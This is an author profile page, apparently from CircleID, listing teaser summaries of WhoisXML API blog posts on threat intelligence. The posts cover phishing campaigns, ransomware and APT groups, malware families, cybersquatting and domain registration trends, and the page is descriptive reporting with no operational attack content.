A Domain Research, Whois, DNS, and Threat Intelligence API and Data Provider
Joined on February 28, 2019
Total Post Views: 5,137,045
About |
Whois API, Inc. (WhoisXML API) is a big data and API company that provides domain research & monitoring, Whois, DNS, IP, and threat intelligence API, data and tools to a variety of industries.
We serve Fortune 500 companies as well as small companies, including cyber-security companies, corporations within a cyber-security division, government agencies, domain registries and registrars, brand agents, domain brokers and investors, marketing data warehouses, banks, telecoms, online payment processors, law firms, financial institutions and many more.
We are established in Los Angeles since 2010 and have been recognized (in 2017, 2018, 2019, 2021, and 2022) as one of Inc. 5000 fastest growing companies, notably in the Security and Top IT categories.
Except where otherwise noted, all postings by WhoisXML API on CircleID are licensed under a Creative Commons License.
Phishing has been around for years, yet it still proves to be a major online threat. To continue profiting, cybercriminals must continuously adapt their techniques. more
The U.S. Office of Public Affairs issued a statement on 4 September 2024 regarding the seizure of 32 websites that are believed to be part of the so-called "Doppelganger" campaign. more
While deepfakes may sometimes be perceived as amusing, their potential for harm is significant and far-reaching. One finance worker for a multinational firm, for example, was tricked into paying out US$25 million to a deepfake scammer who pretended to be their company's chief financial officer (CFO) in a video call just this February. more
Toward the end of August 2024, a customized malware dubbed "Voldemort" based on strings found in its code was used in a cyber espionage campaign targeting various countries. more
At least 40 advanced persistent threat (APT) groups have trailed their sights on several European countries over the years, and that isn't surprising, given that the continent serves as the headquarters of renowned international organizations like the European Union Agency for Law Enforcement Cooperation (Europol), INTERPOL, and the North Atlantic Treaty Organization (NATO). more
Nearly 1 million individuals' information was stolen and exposed when threat actors launched a BlackSuit ransomware attack on 10 April 2024. The investigation revealed that the compromised data included the victims' Social Security numbers (SSNs), birthdays, and insurance claim information. more
Remote access trojans (RATs) can be considered the malware of choice by the world's most notorious advanced persistent threat (APT) groups. And there's a good reason for that. They are hard to detect, making them ideal for lateral movement, and also difficult to get rid of. more
Threat actors can often find targeting certain organizations too much of a challenge. So they need to go through what we can consider back channels -- suppliers, vendors, or service providers. more
While the usage of internationalized domain names (IDNs) has allowed organizations the world over to enter the global market using their native-language domain names, it can also enable cyber attackers to craft look-alikes of legitimate domains they wish to spoof. more
The ReasonLabs Research Team uncovered a new widespread polymorphic malware campaign that forcefully installed extensions on users' systems. more
Satori recently published a report on a massive fraud campaign they have dubbed "Konfety" (Russian word for "candy"). Sounds sweet, right? more
As if the attention surrounding the upcoming U.S. presidential elections is not enough, the WhoisXML API research team may have unveiled thousands of potential sources of disarray -- election-related cybersquatting domains. These domains may be a lucrative source of income for some people. Case in point? more
Fortinet recently discovered a Meduza Stealer variant that has been taking advantage of the Microsoft Windows SmartScreen vulnerability CVE-2024-21412. The Meduza stealer lets remote attackers bypass the SmartScreen security warning dialog to deliver malicious files. more
The WhoisXML API research team analyzed more than 7.3 million domains registered between 1 and 31 July 2024 in this post to identify five of the most popular registrars, top-level domain (TLD) extensions, and other global domain registration trends. more
Cyber espionage is not uncommon and often occurs between rivals. And though the cyber attackers' tactics and techniques remain the same, their tools do not. more
The Zscaler ThreatLabz 2024 Phishing Report named Microsoft, OneDrive, Okta, Adobe, SharePoint, Telegram, pCloud, Facebook, DHL, WhatsApp, ANZ Banking Group, Amazon, Ebay, Instagram, Google, Sparkasse Bank, FedEx, PayU, Rakuten, and Gucci as the 20 most phished brands. more
Advanced persistent threat (APT) groups will employ any means necessary to compromise the networks of their intended targets. And for Cosmic Leopard, that means using GravityRAT, an Android-based malware, and HeavyLift, a Windows-based malware loader, in their most recent operation Cisco Talos has dubbed "Operation Celestial Force." more
Our research team analyzed more than 21.5 million domains registered between 1 April and 30 June 2024, as seen in the Newly Registered Domains (NRDs) Data Feed. more
Keonne Rodriguez and William Lonergan Hill, founders of Samourai Wallet, a cryptocurrency mixing service, were sentenced in April 2024 and their sites taken down for executing more than US$2 billion in unlawful transactions and laundering more than US$100 million in criminal proceeds. more
Phishing is and remains a top threat. Google alone blocks around 100 million phishing emails daily, and it doesn't help that phishers get extra help from phishing kits -- ready-made cybercrime tools that allow even cybercriminal newbies to launch attacks following a few simple steps. more
Threat researcher Dancho Danchev recently uncovered 130 domains that seemingly belong to fake cryptocurrency sellers. The WhoisXML API research team sought to find potential connections to the threat by expanding the current list of indicators of compromise (IoCs) using our vast array of DNS intelligence sources. more
A new advanced persistent threat (APT) group dubbed "Unfading Sea Haze" has been trailing its sights on various organizations based in countries surrounding the South China Sea. more
Check Point Research reported a Foxit PDF Reader vulnerability that threat actors have begun exploiting, putting the application's users at risk. When exploited, the bug triggers security warnings that may deceive unsuspecting users into executing harmful commands. more
Cybercriminals can launch distributed denial-of-service (DDoS) attacks with relative ease these days by using DDoS booter services, online services that automate the DDoS attack process. more
Intel-Ops researchers recently discovered that the 8Base Ransomware Group has been using Phobos ransomware to infect their targets' networks. 8Base has reportedly been active since mid-2023. more
A decade-old advanced persistent threat (APT) group called "Stately Taurus," also known as "Mustang Panda" and "Earth Preta," was recently observed targeting Association of Southeast Asian Nations (ASEAN) countries in cyberespionage activities. Specifically, Palo Alto Networks observed two malware packages that may have been used to target Japan, Myanmar, the Philippines, and Singapore. more
More than 30.6 billion records have been exposed in 2024 so far based on 8,839 publicly disclosed incidents. Intensifying cybersecurity efforts has thus become more critical than ever for organizations the world over. more
Bleeping Computer recently reported that a phishing-as-a-service (PhaaS) available in cybercriminal forums dubbed "Typhoon 2FA" has the ability to compromise Microsoft 365 and Google accounts even if users have two-factor authentication (2FA) enabled. more
The 2024 U.S. tax season is well underway, and as usual, scams of all kinds targeting taxpayers and causing the Internal Revenue Service (IRS) problems have cropped up. One such ongoing malicious campaign has explicitly been trailing its sights on small business owners and the self-employed. more
A new info-stealing malware called "TimbreStealer" is in town. Cisco Talos detected its distribution through a phishing campaign targeting Mexico. more
After analyzing 21+ million newly registered domains (NRDs) added from 1 January to 31 March 2024, our researchers found that the new domain registration volume declined by about 32% from the previous quarter. more
Threat actors have been abusing App Installer, a Windows 10 feature that makes installing applications more convenient. The abuse could lead to ransomware distribution and was likely carried out by financially motivated actors Storm-0569, Storm-1113, Sangria Tempest, and Storm-1674. more
macOS has been gaining the unwanted attention of more and more backdoor operators since late 2023. In February 2024, Bitdefender uncovered RustDoor, which was written in Rust and possibly has ties to the operators of a Windows ransomware. more
Group-IB uncovered ResumeLooters, a threat actor group specializing in victimizing job hunters to steal their personally identifiable information (PII). more
In the past two decades, at least 41 advanced persistent threat (APT) groups have launched attacks on entities and organizations based in North America. more
The Citizen Lab recently uncovered an ongoing online propaganda campaign they have dubbed "PAPERWALL" that has been targeting local news outlets across 30 countries in Europe, Asia, and Latin America. more
VexTrio, a traffic distribution system (TDS) provider believed to be an affiliate of ClearFake and SocGholish, among other threat actors, has been active since 2017. more
Among the latest to suffer from zero-day exploitation is Ivanti, a software company providing endpoint management and remote access solutions to various organizations, including U.S. federal agencies. more
Law enforcement agencies shut down xDedic, a cybercrime-as-a-service (CaaS) marketplace specifically providing web servers to cybercriminals, back in 2019. However, WhoisXML API threat researcher Dancho Danchev posits that parts of its backend infrastructure may remain traceable. more
New kids on the cybercrime block, pig butchering scams, have been making waves lately, and it is not surprising why. Scammers have been earning tons from them by being able to trick users into investing in seemingly legitimate business ventures but losing their hard-earned cash instead. more
RisePro, a malware-as-a-service data stealer, has been plaguing users since 2022. ANY.RUN recently discovered and analyzed its latest version in great depth and identified 10 indicators of compromise (IoCs) -- three domains and seven IP addresses. more
The Sea Turtle threat group recently made headlines when it expanded its operations to target ISPs and telecommunications and media companies in the Netherlands. In the past, Sea Turtle primarily targeted organizations in the Middle East and the U.S. using DNS hijacking and man-in-the-middle (MitM) attacks. more
Cybercriminals are known for using so-called "loaders" like Xloader to initiate computer infections. Worse, even newbies can now get their hands on these malware distributors via hacker forums. Case in point? JinxLoader, one of the latest malicious offerings up for grabs on the likes of hackforums[.]net. more
The Mirai botnet, first discovered way back in 2016, made headlines and gained infamy as the biggest botnet to hit networks the world over. It has resurfaced with multiple ways of infecting Internet of Things (IoT) devices and the ability to launch zero-day exploits. more
Advanced persistent threat (APT) groups are more dangerous than your run-of-the-mill cybercriminals. They, after all, trail their sights not only on financial gain but loftier targets such as wreaking havoc on entire nations. more
WhoisXML API is thrilled to introduce a new version of Website Categorization API and Website Categorization Database. The product line now offers an enhanced website categorization model with additional context and is powered by advanced artificial intelligence (AI) algorithms, offering overall better stability and accuracy. more
Computers that get infected with the Epsilon stealer could spell game over for serious gamers, but they are not the only ones at risk. The creators of games like EPSILON, Pokemon, and Roblox that the malware operators are mimicking stand to lose a lot as well. They may lose customers and damage their reputation in the process. more
WhoisXMl API is proud to announce data quality improvements of the Newly Registered Domains V2 (NRD2) Data Feed, specifically an 89% increase in total coverage over the last 12 months. Moreover, the data feed recorded a 153.95% increase in activity for the top 10 country-code top-level domains (ccTLDs). more
It is not uncommon these days for threat actors to use malicious search ads to distribute malware. To do that, though, they would need to know how to bypass Google's security measures by setting up decoy infrastructures. more
Mandiant's Managed Defense Threat Hunting Team recently published an in-depth study of the malware distributed via what they have dubbed the "UNC2975 malvertising campaign." Users who have been tricked into clicking poisoned sponsored search engine results and social media posts ended up with computers infected with either the DANABOT or DARKGATE backdoor. more
The new domain name registration volume rose 10.24% from the third to the fourth quarter of 2023. WhoisXML API researchers uncovered this finding, along with other DNS trends, after analyzing more than 31 million newly registered domains (NRDs) added from 1 October to 31 December 2023 as seen in the Newly Registered Domains Data Feed. more
The Kimsuky Group, believed to be a North Korea-based advanced persistent threat (APT) group active since 2013, struck again several times this year. They gained notoriety for launching spear-phishing attacks on targets to gain initial access. more
The WailingCrab malware has gained notoriety for its stealth. IBM X-Force security researchers recently published an in-depth analysis of the malware, which has been abusing Internet of Things (IoT) messaging protocol MQTT. more
The Atomic Stealer, also known as "AMOS," first emerged in September this year by spreading on Macs disguised as popular applications. This time around, it has been wreaking more havoc in the guise of a fake browser update dubbed "ClearFake." more
The concept of internationalization extends from the virtual to the physical realm. Many people wish to travel or even migrate to other countries at some point in their lives. Unfortunately, that's sometimes easier said than done given the many legal documents, including valid IDs, passports, and others required. more
As long as cybercriminals remain in business, so will the number of underground marketplaces grow. And despite the crackdown on the biggest markets like Silk Road, cybercriminals will continue to strive to put up their own marketplaces, probably given their profitability. Case in point? more
Rogue bulletproof hosts are part and parcel of the cybercriminal market that is hidden deep underground. Without means to easily evade detection, attribution, and incarceration, many of today's cybercriminals would not be able to continue their malicious operations. more
Carding has been around since the 1980s but has evolved to the point that even less experienced cybercriminals can now launch campaigns. How? Via the carding forums that riddle the Web these days. more
The Federal Bureau of Investigation (FBI) shut down BreachForums, a forum for English-speaking black hat hackers, on 21 March 2023, following the arrest of its owner Conor Brian Fitzpatrick. more
APT29, believed to be an espionage group from Russia, became known for launching targeted attacks against organizations in Ukraine. But over the course of investigating the threat group, Mandiant discovered that it may have a hand in cybercriminal operations, specifically phishing, as well. more
BlackNet RAT, first discovered during the COVID -- 19 pandemic and being distributed via spam messages offering an effective cure for the virus, seems to have outlived the global crisis. more
Threat researcher Dancho Danchev recently discovered a phishing operation that seemed to be abusing .top domains for which he collated 89 email addresses that served as indicators of compromise (IoCs). more
Threat actors have been seen yet again abusing a technology meant to make things easy for all of us -- QR codes -- in one of the most commonly utilized cybercriminal activities - phishing. The rise in QR code phishing isn't surprising given that according to several studies, as much as 86% of the entire global population use their mobile phones for all kinds of transactions, including financial ones. more
A phishing campaign is currently targeting Facebook business accounts with password-stealing malware. The attackers have been using a massive network of fake and compromised Facebook accounts to send out millions of Messenger phishing messages. more
Rhysida, a new ransomware currently plaguing users may not be novel, but it's proving to be just as effective. Fortra published an in-depth analysis of the malware currently holding the data of healthcare organizations primarily based in the U.S. hostage. more
It's not uncommon for cybercriminals to tweak an existing piece of malware and then call it a new creation. We've seen that happen even in malware's earliest days. It's actually happening more and more these days, especially with the rise of the malware-as-a-service (MaaS) business model. more
XLoader has been plaguing macOS users since it was first discovered in 2021. Back then, though, it only posed a threat to those who opted to install Java on their systems. more
DNS abuse combined with redirection seems to be gaining popularity as a stealth mechanism. We've just seen Decoy Dog employ the same tactic. More recently, a still-unnamed JavaScript (JS) malware has been wreaking havoc among WordPress site owners by abusing Google Public DNS to redirect victims to tech support scam sites. more
Given the ubiquity of mobile phone usage, you'd think we'd all know by now how to tell legitimate from scammy text messages. Then again, cybercriminals are always on top of their game -- learning how the latest technologies work and finding ways to abuse them. more
Financially motivated threat actors called "TA544" were first detected in 2017. TA544 is known for high-volume campaigns, sending hundreds of thousands of malicious messages daily. more
Evolution isn't only for humans and other living things. Apparently, malware can evolve, too, and IcedID is a good example. First detected as a banking trojan in 2017, IcedID continues to undergo updates that make it even more dangerous. In the past few months, IcedID variants have been observed to deliver ransomware payloads instead of performing its original function -- stealing financial data. more
WoofLocker tech support scams have been wreaking havoc since 2017 but the threat actors behind it don't seem to be done yet. In fact, the threat may have become even more resilient. more
Decoy Dog, a malware renowned for abusing the DNS, specifically by establishing command and control (C&C) via DNS queries, first reared its head most likely in early 2022. Given its sly nature, the DNS malware has been used to successfully steal data from organizations throughout Russia and other Eastern European nations. more
Threat actors have been targeting vulnerable Redis instances since February 2022 when the Redis Lua Sandbox Escape and Remote Code Execution Vulnerability, also known as "CVE -- 2022 -- 0543," was discovered. The Mushtik Gang was one of the first cyber attack groups to exploit it. more
APT41, also known as "Winnti," "BARIUM," or "Double Dragon," is an APT group said to originate from China. Having been active since 2012, APT41 rose to infamy by successfully launching targeted cyber espionage attacks on government agencies and private companies worldwide. more
Even solutions meant to enhance security can sometimes fall prey to the best cyber attackers. That's what happened to JumpCloud, a cloud-based directory service platform designed to centralize and simplify identity access management (IAM). more
Cyber espionage group MuddyWater's or Mercury's first major campaign was seen as early as 2012. But as things always go in the cybersecurity realm, threat groups, especially those that gain infamy, don't necessarily just come and go. more
The latest fraud data Sift published in "Q2 2023 Digital Trust & Safety Index" revealed that 78% of users are concerned that fraudsters could exploit AI tools to victimize them. more
Phishing, despite its age and infamy, remains one of the top threats to corporate and personal networks alike. And it's not hard to see why -- it continues to be effective. In fact, more than a third of all data breaches today involve phishing. more
It's not unusual for data stealers to target several browsers simultaneously. Zooming in on multiple platforms at once, including email clients, gaming portals, chat apps, crypto wallets, and even VPN-protected services, however, is quite novel. more
Each time organizations shore up their network defenses, cybercriminals devise new and innovative ways to up the cyber attack ante. That's actually the rationale behind malware crypting - the process of making malicious programs, apps, and files appear harmless to anti-malware and intrusion detection solutions. more
The first time the BlackCat ransomware gang breached Reddit's network last February, they phished an employee to hack into the target network. This time, according to a ReversingLabs detailed report, they successfully dropped BlackCat onto the company's systems and threatened to release its data if it fails to pay the ransom. more
The beginning of the month of June, according to CleanINTERNET, marked the emergence of several zero-day attacks targeting vulnerable MOVEit servers to exfiltrate confidential data. MOVEit Transfer is a managed file transfer software that supports file and data exchange. more
Google's announcement of the launch of the .zip ngTLD was met by a lot of debate. Many believe threat actors could abuse the ngTLD for phishing and other malicious campaigns, primarily since it could be easily confused with the .zip file extension. more
ReliaQuest named LockBit one of the most effective and undoubtedly most prolific currently active ransomware groups today. In fact, the malware topped their latest ransomware quarterly list for the first three months of 2023, a continuation of their 2022 observation. more
Organizations get bombarded with countless attacks from every direction, including via their supply chain. FortifyData's recent record of the top third-party data breaches in 2023 brings to light how multidirectional threat sources can be. In one of the data breaches on the list, AT&T disclosed in March 2023 that threat actors accessed the information of approximately 9 million wireless accounts through the telecommunication company's marketing vendor. more
Last year, several governments reportedly used the NSO Group's spyware Pegasus to exploit a zero-day vulnerability in WhatsApp to spy on journalists, opposition politicians, and dissidents via their mobile devices. Apple quickly addressed the issue by launching more powerful data protection features. more
Google ad or search engine optimization (SEO) poisoning has long been a favored threat actor tactic to spread malware. A recent Secureworks study of Bumblebee, which comes in the guise of a software installer, proved that once again. more
The more dangerous browsing the Internet becomes, the more tools to address cyber threats emerge in the market. Virtual private network (VPN) service usage, for instance, gained ubiquity due to the ever-increasing number of data privacy intrusions. more
We've proven time and again that the effects of current events always extend to the DNS. Just last month, two big banks - the Silicon Valley Bank (SVB) and Credit Suisse - collapsed. Financial experts said more banks may be bound to follow. more
Threat actors continue to abuse the DNS by weaponizing domain names. On 13 April 2023, through our recently launched Threat Intelligence Data Feeds (TIDF), we identified more than 1 million suspicious and malicious domains that figured in phishing, malware distribution, spam, and other cyber attacks, such as brute-force and distributed denial-of-service (DDoS) attacks. more
Threats tend to become more advanced over time. So is the case of business email compromise (BEC) scams, which according to a SlashNext post, cost companies billions of U.S. dollars in losses per year. more
Infoblox, in its Q4 2022 Cyber Threat Report, featured a "Meta" coin scam using fake celebrity endorsements targeting users in the European Union (EU). The analysis revealed several indicators of compromise (IoCs), specifically four domains and one IP address, that could help the public avoid the perils the scams posed. more
Although fraud is a global issue, some threats may be unique to certain regions. Accertify listed some subtrends specific to Latin America and the Caribbean (LAC), including those involving the airline and digital wallet industries. more
Back in January of this year, we studied the infrastructure of Ducktail, a malware that trailed its sights on Facebook business owners and advertisers. Just this month, Morphisec researchers found a similar threat they've dubbed "SYS01." more
Among the most active and rapidly spreading ransomware in 2022 was Black Basta. It was first detected in April 2022 and victimized nearly 100 organizations in North America, Europe, and Asia by September that same year. As a ransomware-as-a-service (RaaS) malware, Black Basta employs double extortion to force victims to pay the ransom. more
Even if cyber attack tactics, techniques, and procedures (TTPs) have become increasingly sophisticated over the years, age-old phishing remains the most-used attack vector to this day. more
Lorec53, a relatively new APT group according to NSFocus, actively targeted various Eastern European government institutions in 2021. The threat actors used well-crafted phishing campaigns to gather and steal data from their targets. Two years after their heyday, is the threat Lorec53 poses gone? Or has the group left still-active traces in the DNS? more
On 10 February 2023, Reddit announced it suffered a security incident where a phishing campaign led an employee to a website that imitated the network's intranet gateway. more
Scammers and fraudsters have been making life hard for users the world over for a long time now. To help expose potential malicious campaigns, threat researchers like Dancho Danchev have been collating indicators of compromise (IoCs) that can be used in further investigations. more
The healthcare industry has had a rough couple of years since the COVID-19 pandemic started. But this didn't stop threat actors from attacking the sector, with several healthcare organizations targeted by ransomware, data breach, and other cyber attacks. more
Since its launch last November, the ChatGPT hype has only increased not only among users but also abusers. Cyble researchers recently spotted phishing attacks using supposed ChatGPT sites to phish for personally identifiable information (PII), specifically credit card data. more
We've seen threat actors abuse almost all Windows OS applications in their campaigns, disguising malware as macros, Word documents, Excel spreadsheets, and PowerPoint presentations to trick users into opening and executing them. Most recently, they've been spreading malware in the guise of OneNote documents to cause mayhem. more
Carding or the theft and consequent selling of credit and other payment card information to users has long been a problem. And with the ease of obtaining hosts for carder forums and communities and hiding their tracks online, the threat has become even bigger. more
As all initial-access threats go, SocGholish is among the trickiest. It often comes disguised as software updates, deceiving victims into downloading a malicious payload that could eventually lead to more lethal cyber attacks. In fact, researchers at ReliaQuest found evidence that an initial SocGholish malware distribution was intended to deploy ransomware. more
The Hive Ransomware Group has had more than 1,500 victims across more than 80 countries worldwide. They attacked hospitals, school districts, financial firms, and critical infrastructure until the U.S. Department of Justice (DOJ) disrupted their operations. Have we seen the fall of the group's entire infrastructure? more
Targeting governments the world over in cyber attacks is not a novel concept. Doing that using mobile apps, however, is quite new as a tactic. And that's what Cyble researchers reported as Gigabud RAT's modus operandi - trailing its sights on citizens of Thailand, the Philippines, and Peru who use government-owned institutions' mobile apps. more
Putting on a mask on malware has always worked to trick users into downloading them, and the threat actors behind Batloader banked on just that. Trend Micro researchers tracked and analyzed Batloader-related developments toward the end of 2022. more
Taking control of victims' accounts is typically the end goal of many cybercriminals, and they never cease to come up with wily ways to do so. Bleeping Computer researchers recently spotted hackers spreading malware mayhem through Google search ads supposedly pointing to open-source software download sites. more
AutoIT-compiled malware and Dridex trace their roots to as far back as 2008 and 2014, respectively. As malware variants go, therefore, they've both had a long history and taken on various forms over time. But despite having been detected and consequently blocked with each new version, they're still alive and kicking -- a testament to their persistence. more
Threat actors have been targeting Zoom and its users since the platform's launch, and it's easy to see why -- the latest stats show it accounts for 3.3 trillion annual meeting minutes worldwide. It's not surprising, therefore, that cyber attackers trailed their sights yet again on the communication app. more
Cyber espionage group Cloud Atlas has been trailing its sights on critical infrastructure operators in countries suffering from political conflict since its discovery in 2014. Aptly nicknamed "Inception," the group's tactic of going after nations with bigger problems than cybersecurity seems to be working, as evidenced by successful intrusions over the years. more
As far back as September 2022, Trend Micro reported that threat actors began exploiting chat apps Comm100 and LiveHelp100 to launch supply chain attacks. In a bid to help potential targets curb the problem, they publicized nine indicators of compromise (IoCs), specifically command-and-control (C&C) server addresses. more
As an age-old digital threat, phishing just continues to grow in sophistication over time, as DarkTortilla showed. Cyble Research and Intelligence Labs (CRIL) published a technical analysis of the threat specifically targeting Cisco and Grammarly. Are there other potential threat vectors, though? more
Earlier this month, ReversingLabs published a report on the current state of software supply chain security. They stated that the volume of such attacks using npm and PyPI code have increased by a combined 289% in the past four years. The research also cited two npm attacks as evidence -- IconBurst and Material Tailwind. more
For roughly US$100, threat actors can purchase RedLine Stealer, a malware-as-a-service (MaaS) program first detected in March 2020 that continues to wreak havoc to this day. The malware can steal information from infected devices, including autocomplete and saved information on browsers. more
WithSecure recently unveiled a malicious campaign dubbed "Ducktail," which trailed its sights on Facebook business owners and advertisers. Believed to be run by Vietnamese operators, Ducktail uses malware to steal data from victims and hijack vulnerable Facebook business properties. more
Stealth is a typical goal for most threat actors when launching malware and other attacks. The better hidden a malware is, the more effective an attack becomes. And that is what fast-rising data stealer Aurora is gaining notoriety for. more
DEV -- 0569, a threat actor Microsoft has been monitoring, was recently observed deploying Royal ransomware via pages posing as legitimate software download sites and repositories, among other stealthy tactics. He has so far used fake download sites for Adobe Flash Player, AnyDesk, Zoom, and TeamViewer in phishing emails and domains. more
WhoisXML API's IP intelligence now includes Regulatory Compliance IP Data Feeds available as separate IP geolocation and IP netblocks files. These data feeds are filtered to only provide the IP geolocation and ownership data of IP addresses from sanctioned or restricted locations as specified by different regulatory authorities. more
In the realm of cybersecurity, seizing domains unfortunately doesn't always mean the end for the threats they pose. Such could be the case for the 18 domains U.S. law enforcement agents recently took offline for their ties to a money mule recruitment operation reported by Bleeping Computer. more
SecurityScorecard published a report on a cyber attack that a U.S. county victim announced on 11 September 2022. With ransomware attacks against local government units increasing in the past few years, WhoisXML API researchers decided to build on the list of IP addresses related to the attacks. more
Zimperium zLabs threat researchers recently reported the case of the Cloud9 Chrome Botnet, and rightly so. Many of us seem to forget just how much information cybercriminals can steal from our browsers. more
The Pakistan-India rivalry has been going on for some time now, not just in sports events but also online in the form of cyber attacks. Zscaler ThreatLabz has been monitoring a result of this ongoing friction -- Transparent Tribe, also known as "APT -- 36" -- since the start of this year. more
The threat actor dubbed "RomCom," known for deploying spoofed versions of popular software, has been quite busy these past few months. In the past, he was seen imitating Advanced IP Scanner and PDF Filler. More recently, though, he's been targeting Ukraine, the U.K., and other English-speaking countries by spoofing SolarWinds, KeePass, PDF Reader Pro, and Veeam. more
You may be wondering who Robin Banks is, but you should instead ask what Robin Banks is. Robin Banks is a phishing-as-a-service (PhaaS) platform that first surfaced in March this year. The name is a play on the phrase "robbing banks," coined by IronNet researchers who introduced the malicious platform to the world. more
This year, the stock market is at its most volatile state due to several factors. Debates abound about whether 2022 will be as bad as 2008, but we'll leave that up to the experts. more
Did you know that a Magniber ransomware infection can cost you a ransom of as much as US$2,500? The operators' favored method of delivery? Fake Windows 10 updates, putting 80% of all Windows operating system (OS) users worldwide at risk. The campaign, believed to have begun in April this year, remains a threat. Are Windows 10 users the only ones at risk, though? more
It has become customary for cybercriminals to ride on famous brands to make their nefarious campaigns work. The release of the world's most-awaited tech gadgets is no different. And given the public attention and techies' innate desire to be first to own the latest gadgets, threat actors will always zoom in on prospective buyers via the most ingenious scams. more
Internet users are being tricked into installing browser extensions that can hijack their web searches. The end goal could be to insert affiliate links, but who knows what other malicious activities the threat actors behind them are capable of? more
Anyone who wishes to browse the Internet without the prospect of being spied upon by others, whether for legal or illegal purposes, can always rely on using the Tor browser if they're so inclined. more
Palo Alto Networks threat analysts discovered more than 12,000 cases of domain shadowing after scanning the Web from April to June 2022. For this threat, all cybercriminals need to do is create malicious subdomains under legitimate domains... more
Eternity, also known as the "EternityTeam" or "Eternity Project," has been active since January 2022 and tied to the Jester Group. It gained infamy for using the as-a-service subscription model to distribute its own brand of malware modules via underground forums. more
Cyber jihad loosely refers to Islamic extremist terrorists' use of the Internet as a communications, fundraising, recruitment, training, and planning tool in their war against their enemies. Some of their most commonly cited enemies include the U.S., Western European countries, secular Arab governments, and Israel. more
BlackEnergy first appeared in 2007. Designed to launch distributed denial-of-service (DDoS) attacks or download customized spam or banking data-stealer plug-ins, it was again used to target the State Bar of Georgia last May more
Malicious spam, possibly the oldest kind of cyber threat, likely remains one of enterprises' biggest security concerns. Regardless of form and affected device, clicking a malicious link embedded in a spam email or downloading a malware-laden attachment can lead to financial, data, or identity theft. more
The Syrian Electronic Army (SEA) is a group of threat actors that have been around since 2011. Some of their possible victims are PayPal, eBay, Twitter, media outlets, and some U.S. government websites. more
The Russian Business Network (RBN) claimed to be a legitimate Internet service provider (ISP) back in 2006. Shortly after establishing its business, however, it gained notoriety for hosting the sites owned by spammers, malware operators, distributed denial-of-service (DDoS) attackers, and other cybercriminals. more
WhoisXML API threat researcher Dancho Danchev obtained a publicly accessible list of email addresses known to be owned and used by Iranian hackers. The email addresses led us to more than 4,400 domain names, any of which can be weaponized and used in phishing, credential theft, and other forms of cyber attacks. more
GitHub is a popular code repository used by almost all software developers. Anyone can access it to share their code with practically anyone interested. Unfortunately, not every GitHub user is trustworthy. It has, in fact, been used to host malware at least a couple of times. more
The Maze Ransomware Group is one of the most notorious threat actor groups targeting large enterprises, such as Cognizant, Xerox, and Canon, and stealing massive amounts of sensitive data. Some of their ransomware distribution methods include spamming, phishing, and brute forcing. more
In 2018, nine Mabna hackers were indicted by a U.S. grand jury for their involvement in different instances of cybercrime. Their victims included about 320 universities and over 50 private, government, and nongovernmental organizations in several countries. more
The Democratic National Committee (DNC) breach was a high-profile cyber attack in recent history. Years later, the cybersecurity community can still benefit from insights and actionable intelligence relevant to the attack. In line with this, WhoisXML API threat researcher Dancho Danchev dove deep into the DNS system intrusion using publicly available indicators of compromise (IoCs). We further enriched his findings, allowing us to uncover: more
Anything conveniently obtainable online is often ripe for cybercriminal picking, and that's certainly true for the most commonly used software. We can't live without them, after all, if we are to thrive and not just survive in the digital world. more
Age is rarely an issue when it comes to malware campaigns, and that's certainly true for WebAttacker. WebAttacker is a do-it-yourself (DIY) malware creation kit that became popular back in 2006. It was the first exploit kit made available to cybercriminals in the Russian underground market for as little as US$20. more
The infamous gray hat security company Ashiyane Digital Security Team has gone back online in 2021. At that time, WhoisXML API threat researcher Dancho Danchev exposed more than 100 domains belonging to the group. This analysis was recently expanded to further explore the Iran-based threat group's Internet-connected infrastructure. more
Pay-per-install (PPI) businesses and affiliate networks made for a booming cybercriminal underground market from 2008 to 2013. Buoyed by the proliferation of fake antivirus (FakeAV) peddlers, operators made staggering profits from the sale of rogue security software.
more
Early last July 2022, news broke out about the arrest of a CEO who allegedly sold fake Cisco networking devices. While he used e-commerce sites as sales channels, the idea that counterfeit products are also peddled through cybersquatting domains is not too far-fetched. more
We tracked the digital spillovers of the Russia-Ukraine war two weeks after it began and saw how the news was reflected in domain registrations. We also noticed that even this year’s Oscars slapping incident drove relevant domain registrations. more
The public attention COVID -- 19 got was truly reflected in the Domain Name System (DNS). And Monkeypox seems to be following the trail the pandemic blazed, though to a smaller extent, as threat actors seem to be using it as the latest phishing lure. How has this new virus been affecting domain registration? more
AAAA and PTR records were added to WhoisXML API's DNS Database Download's existing pool of six DNS record types (i.e., A, MX, NS, TXT, CNAME, and SOA records). All these records are now updated daily, making the database more up-to-date and relevant in supporting security processes. more
A financially motivated threat group called "Roaming Mantis" was seen targeting Android and iOS device users through malicious SMS communications. The messages sent Android phone users to download pages while iOS users were redirected to credential-stealing login pages. more
Agent Tesla, an infamous data stealer, has been plaguing Internet users since 2014. Much has been revealed about the malware, but the world didn't come to know about one of its more adept campaign perpetrators -- Hagga -- until last year. more
Months after TikTok launched its marketplace in September 2021, several users have raised concerns about the authenticity of the products they purchased. The complaints mainly pertain to beauty products, such as sunscreens, lip glosses, and makeup brushes. Aside from being ripped off, consumers may be exposed to more danger. more
A group of researchers recently discovered a new Android banking Trojan they called "Revive" since threat actors designed it to restart if it stops working. Once a device is infected, hackers can intercept messages, including online banking one-time passwords (OTPs). Revive also enables attackers to steal login credentials since it can read and store everything the user types on the infected device. more
Scammers and counterfeiters are always on the lookout for quick gains. And the more expensive the fake item, the bigger the possible gain. It’s no wonder then why they’re looking to mimic the world’s most popular luxury jewelers. more
The Koobface Gang gained notoriety from 2008 to the 2010s for spreading malware via Facebook and other social networks. Believe it or not, the gang amassed millions of dollars from their online scams while hiding in plain sight in St. Petersburg, Russia. After being publicly identified in 2012, the gang members shut down their operations. more
Aoqin Dragon, like the mythical character it's named after, has recently been unearthed after nearly a decade of flying under the cybersecurity community's radar. Now believed to have been active since 2013, the advanced persistent threat (APT) group has targeted various organizations in the government, education, and telecommunications sectors. more
For US$2,500, threat actors can employ Matanbuchus, a malware-as-a-service (MaaS) package found delivering Cobalt Strike beacons through phishing and spam messages. Cobalt Strike is a powerful security tool that threat actors are increasingly using as a reconnaissance and post-exploitation weapon. more
Threat actors are increasingly impersonating businesses in phishing attacks. In May 2022, 52% of business email compromise (BEC) scams impersonated third-party organizations, exposing businesses to supply chain attacks. more
Conti ransomware surfaced as far back as 2020. Believed to have been created by Russia-based cybercriminal group Wizard Spider, it has been involved in a multitude of double extortion campaigns over the years. more
As technology advances, so does the world of espionage. That has given birth to several companies, such as Cytrox, that specialize in creating spyware. Predator, along with other applications of its kind, has been advertised as legal spyware-for-hire. more
